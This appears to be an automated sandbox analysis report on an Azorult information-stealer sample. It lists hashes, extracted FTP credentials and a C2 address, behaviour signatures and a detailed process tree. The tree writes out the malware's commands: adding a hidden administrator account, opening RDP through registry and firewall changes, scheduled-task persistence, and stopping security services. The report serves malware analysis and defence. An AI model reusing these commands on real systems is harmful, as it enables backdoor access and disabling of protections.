Analysis

  • max time kernel
    160s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05-03-2024 13:08

General

  • Target

    Azorult.exe

  • Size

    10.0MB

  • MD5

    5df0cf8b8aa7e56884f71da3720fb2c6

  • SHA1

    0610e911ade5d666a45b41f771903170af58a05a

  • SHA256

    dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360

  • SHA512

    724ce5e285c0ec68464c39292be62b80124909e98a6f1cd4a8ddee9de24b9583112012200bf10261354de478d77a5844cb843673235db3f704a307976164669a

  • SSDEEP

    196608:NjIrZDbMLq8TKqTNNRYWzmf1e4Qx/PMPTZPkTGX9sqiL/aVvTA:N2Z4DRYWXdaZPGy9sJL/aVv

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    109.248.203.81
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Family

azorult

C2

http://boglogov.site/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass 3 TTPs 5 IoCs
  • Windows security bypass 2 TTPs 1 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 23 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 3 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • ASPack v2.12-2.42 10 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 29 IoCs
  • Modifies file permissions 1 TTPs 62 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 7 IoCs
  • AutoIT Executable 14 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Launches sc.exe 24 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 7 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • NTFS ADS 1 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Azorult.exe
    "C:\Users\Admin\AppData\Local\Temp\Azorult.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • UAC bypass
    • Blocks application from running via registry modification
    • Drops file in Drivers directory
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Modifies WinLogon
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2692
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2388
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Programdata\Windows\install.bat" "
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1584
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            5⤵
            • UAC bypass
            • Windows security bypass
            • Runs .reg file with regedit
            PID:2508
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            5⤵
            • Runs .reg file with regedit
            PID:2840
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:2872
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2868
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:1796
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1632
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            5⤵
            • Views/modifies file attributes
            PID:2840
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            5⤵
            • Views/modifies file attributes
            PID:2076
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            5⤵
            • Launches sc.exe
            PID:1724
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            5⤵
            • Launches sc.exe
            PID:1988
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            5⤵
            • Launches sc.exe
            PID:768
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        PID:524
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Programdata\Install\del.bat
          4⤵
            PID:468
            • C:\Windows\SysWOW64\timeout.exe
              timeout 5
              5⤵
              • Delays execution with timeout.exe
              PID:548
      • C:\programdata\install\cheat.exe
        C:\programdata\install\cheat.exe -pnaxui
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\ProgramData\Microsoft\Intel\taskhost.exe
          "C:\ProgramData\Microsoft\Intel\taskhost.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1216
          • C:\programdata\microsoft\intel\P.exe
            C:\programdata\microsoft\intel\P.exe
            4⤵
            • Executes dropped EXE
            PID:2764
          • C:\programdata\microsoft\intel\R8.exe
            C:\programdata\microsoft\intel\R8.exe
            4⤵
            • Executes dropped EXE
            PID:2144
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
              5⤵
                PID:2592
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\rdp\pause.bat" "
                  6⤵
                  • Loads dropped DLL
                  PID:2468
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im Rar.exe
                    7⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2536
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im Rar.exe
                    7⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3032
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 3
                    7⤵
                    • Delays execution with timeout.exe
                    PID:2116
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    7⤵
                      PID:2128
                    • C:\rdp\Rar.exe
                      "Rar.exe" e -p555 db.rar
                      7⤵
                      • Executes dropped EXE
                      PID:1180
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im Rar.exe
                      7⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2932
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      7⤵
                      • Delays execution with timeout.exe
                      PID:2856
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                      7⤵
                        PID:592
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\rdp\bat.bat" "
                          8⤵
                          • Loads dropped DLL
                          PID:2992
                          • C:\Windows\SysWOW64\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                            9⤵
                              PID:436
                            • C:\Windows\SysWOW64\reg.exe
                              reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                              9⤵
                                PID:2516
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                                9⤵
                                • Modifies Windows Firewall
                                PID:1684
                              • C:\Windows\SysWOW64\net.exe
                                net.exe user "john" "12345" /add
                                9⤵
                                  PID:2140
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 user "john" "12345" /add
                                    10⤵
                                      PID:2320
                                  • C:\Windows\SysWOW64\chcp.com
                                    chcp 1251
                                    9⤵
                                      PID:2716
                                    • C:\Windows\SysWOW64\net.exe
                                      net localgroup "Администраторы" "John" /add
                                      9⤵
                                        PID:1580
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                                          10⤵
                                            PID:2664
                                        • C:\Windows\SysWOW64\net.exe
                                          net localgroup "Administratorzy" "John" /add
                                          9⤵
                                            PID:400
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                                              10⤵
                                                PID:2864
                                            • C:\Windows\SysWOW64\net.exe
                                              net localgroup "Administrators" John /add
                                              9⤵
                                                PID:2192
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                  10⤵
                                                    PID:1936
                                                • C:\Windows\SysWOW64\net.exe
                                                  net localgroup "Administradores" John /add
                                                  9⤵
                                                    PID:1016
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                                                      10⤵
                                                        PID:768
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net localgroup "Пользователи удаленного рабочего стола" John /add
                                                      9⤵
                                                        PID:2304
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                          10⤵
                                                            PID:3064
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net localgroup "Пользователи удаленного управления" John /add
                                                          9⤵
                                                            PID:2040
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                                                              10⤵
                                                                PID:1796
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net localgroup "Remote Desktop Users" John /add
                                                              9⤵
                                                                PID:1180
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                                                                  10⤵
                                                                    PID:836
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net localgroup "Usuarios de escritorio remoto" John /add
                                                                  9⤵
                                                                    PID:1108
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                                                                      10⤵
                                                                        PID:1812
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                      9⤵
                                                                        PID:324
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                          10⤵
                                                                            PID:2496
                                                                        • C:\rdp\RDPWInst.exe
                                                                          "RDPWInst.exe" -i -o
                                                                          9⤵
                                                                          • Sets DLL path for service in the registry
                                                                          • Executes dropped EXE
                                                                          • Modifies WinLogon
                                                                          • Drops file in Program Files directory
                                                                          • Modifies system certificate store
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2600
                                                                          • C:\Windows\system32\netsh.exe
                                                                            netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                            10⤵
                                                                            • Modifies Windows Firewall
                                                                            PID:1936
                                                                        • C:\rdp\RDPWInst.exe
                                                                          "RDPWInst.exe" -w
                                                                          9⤵
                                                                          • Executes dropped EXE
                                                                          PID:1868
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                                                                          9⤵
                                                                            PID:2464
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net accounts /maxpwage:unlimited
                                                                            9⤵
                                                                              PID:1656
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                                10⤵
                                                                                  PID:1876
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                                                                                9⤵
                                                                                • Sets file to hidden
                                                                                • Drops file in Program Files directory
                                                                                • Views/modifies file attributes
                                                                                PID:2876
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h "C:\Program Files\RDP Wrapper"
                                                                                9⤵
                                                                                • Sets file to hidden
                                                                                • Drops file in Program Files directory
                                                                                • Views/modifies file attributes
                                                                                PID:776
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +s +h "C:\rdp"
                                                                                9⤵
                                                                                • Sets file to hidden
                                                                                • Views/modifies file attributes
                                                                                PID:324
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout 2
                                                                            7⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:1744
                                                                    • C:\ProgramData\Microsoft\Intel\winlog.exe
                                                                      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:2796
                                                                      • C:\ProgramData\Microsoft\Intel\winlogon.exe
                                                                        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:2268
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D74C.tmp\D74D.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
                                                                          6⤵
                                                                            PID:2808
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
                                                                              7⤵
                                                                              • Drops file in System32 directory
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2324
                                                                      • C:\Programdata\RealtekHD\taskhostw.exe
                                                                        C:\Programdata\RealtekHD\taskhostw.exe
                                                                        4⤵
                                                                        • Modifies visiblity of hidden/system files in Explorer
                                                                        • Executes dropped EXE
                                                                        • Adds Run key to start application
                                                                        • NTFS ADS
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                        PID:1500
                                                                        • C:\Programdata\WindowsTask\winlogon.exe
                                                                          C:\Programdata\WindowsTask\winlogon.exe
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:828
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /C schtasks /query /fo list
                                                                            6⤵
                                                                              PID:2008
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /query /fo list
                                                                                7⤵
                                                                                  PID:2264
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ipconfig /flushdns
                                                                              5⤵
                                                                                PID:3024
                                                                                • C:\Windows\system32\ipconfig.exe
                                                                                  ipconfig /flushdns
                                                                                  6⤵
                                                                                  • Gathers network information
                                                                                  PID:2276
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c gpupdate /force
                                                                                5⤵
                                                                                  PID:2700
                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                    gpupdate /force
                                                                                    6⤵
                                                                                      PID:1332
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:584
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:1984
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c C:\programdata\microsoft\temp\H.bat
                                                                                  4⤵
                                                                                  • Drops file in Drivers directory
                                                                                  PID:1312
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /c C:\programdata\microsoft\temp\Temp.bat
                                                                                  4⤵
                                                                                    PID:616
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      TIMEOUT /T 5 /NOBREAK
                                                                                      5⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:2368
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      TIMEOUT /T 3 /NOBREAK
                                                                                      5⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:2756
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      TASKKILL /IM 1.exe /T /F
                                                                                      5⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2548
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      TASKKILL /IM P.exe /T /F
                                                                                      5⤵
                                                                                      • Kills process with taskkill
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:1320
                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                      ATTRIB +H +S C:\Programdata\Windows
                                                                                      5⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:852
                                                                              • C:\programdata\install\ink.exe
                                                                                C:\programdata\install\ink.exe
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:2132
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sc start appidsvc
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1240
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  sc start appidsvc
                                                                                  3⤵
                                                                                  • Launches sc.exe
                                                                                  PID:400
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                                                2⤵
                                                                                  PID:2080
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc start appmgmt
                                                                                    3⤵
                                                                                    • Launches sc.exe
                                                                                    PID:2916
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                                  2⤵
                                                                                    PID:704
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      sc config appidsvc start= auto
                                                                                      3⤵
                                                                                      • Launches sc.exe
                                                                                      PID:2336
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                                    2⤵
                                                                                      PID:1612
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        sc config appmgmt start= auto
                                                                                        3⤵
                                                                                        • Launches sc.exe
                                                                                        PID:3016
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                      2⤵
                                                                                        PID:2696
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          sc delete swprv
                                                                                          3⤵
                                                                                          • Launches sc.exe
                                                                                          PID:2556
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                        2⤵
                                                                                          PID:2940
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc stop mbamservice
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:2480
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                          2⤵
                                                                                            PID:2592
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              sc stop bytefenceservice
                                                                                              3⤵
                                                                                              • Launches sc.exe
                                                                                              PID:2972
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                            2⤵
                                                                                              PID:2436
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc delete bytefenceservice
                                                                                                3⤵
                                                                                                • Launches sc.exe
                                                                                                PID:2832
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                              2⤵
                                                                                                PID:1712
                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                  sc delete mbamservice
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:1204
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                                2⤵
                                                                                                  PID:240
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc delete crmsvc
                                                                                                    3⤵
                                                                                                    • Launches sc.exe
                                                                                                    PID:2788
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sc delete "windows node"
                                                                                                  2⤵
                                                                                                    PID:1576
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc delete "windows node"
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:1004
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
                                                                                                    2⤵
                                                                                                      PID:1360
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc stop Adobeflashplayer
                                                                                                        3⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:3060
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
                                                                                                      2⤵
                                                                                                        PID:2864
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          sc delete AdobeFlashPlayer
                                                                                                          3⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:1104
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sc stop MoonTitle
                                                                                                        2⤵
                                                                                                          PID:2860
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc stop MoonTitle
                                                                                                            3⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:1776
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
                                                                                                          2⤵
                                                                                                            PID:2956
                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                              sc delete MoonTitle"
                                                                                                              3⤵
                                                                                                              • Launches sc.exe
                                                                                                              PID:932
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c sc stop AudioServer
                                                                                                            2⤵
                                                                                                              PID:1832
                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                sc stop AudioServer
                                                                                                                3⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:928
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c sc delete AudioServer"
                                                                                                              2⤵
                                                                                                                PID:1344
                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                  sc delete AudioServer"
                                                                                                                  3⤵
                                                                                                                  • Launches sc.exe
                                                                                                                  PID:1108
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
                                                                                                                2⤵
                                                                                                                  PID:2472
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    sc stop clr_optimization_v4.0.30318_64
                                                                                                                    3⤵
                                                                                                                    • Launches sc.exe
                                                                                                                    PID:2304
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
                                                                                                                  2⤵
                                                                                                                    PID:2324
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc delete clr_optimization_v4.0.30318_64"
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:516
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
                                                                                                                    2⤵
                                                                                                                      PID:640
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc stop MicrosoftMysql
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:2988
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
                                                                                                                      2⤵
                                                                                                                        PID:2136
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc delete MicrosoftMysql
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:1852
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                                                        2⤵
                                                                                                                          PID:632
                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                            netsh advfirewall set allprofiles state on
                                                                                                                            3⤵
                                                                                                                            • Modifies Windows Firewall
                                                                                                                            PID:2808
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                          2⤵
                                                                                                                            PID:1160
                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                              netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                              3⤵
                                                                                                                              • Modifies Windows Firewall
                                                                                                                              PID:1872
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                            2⤵
                                                                                                                              PID:2960
                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                                3⤵
                                                                                                                                • Modifies Windows Firewall
                                                                                                                                PID:284
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                              2⤵
                                                                                                                                PID:616
                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
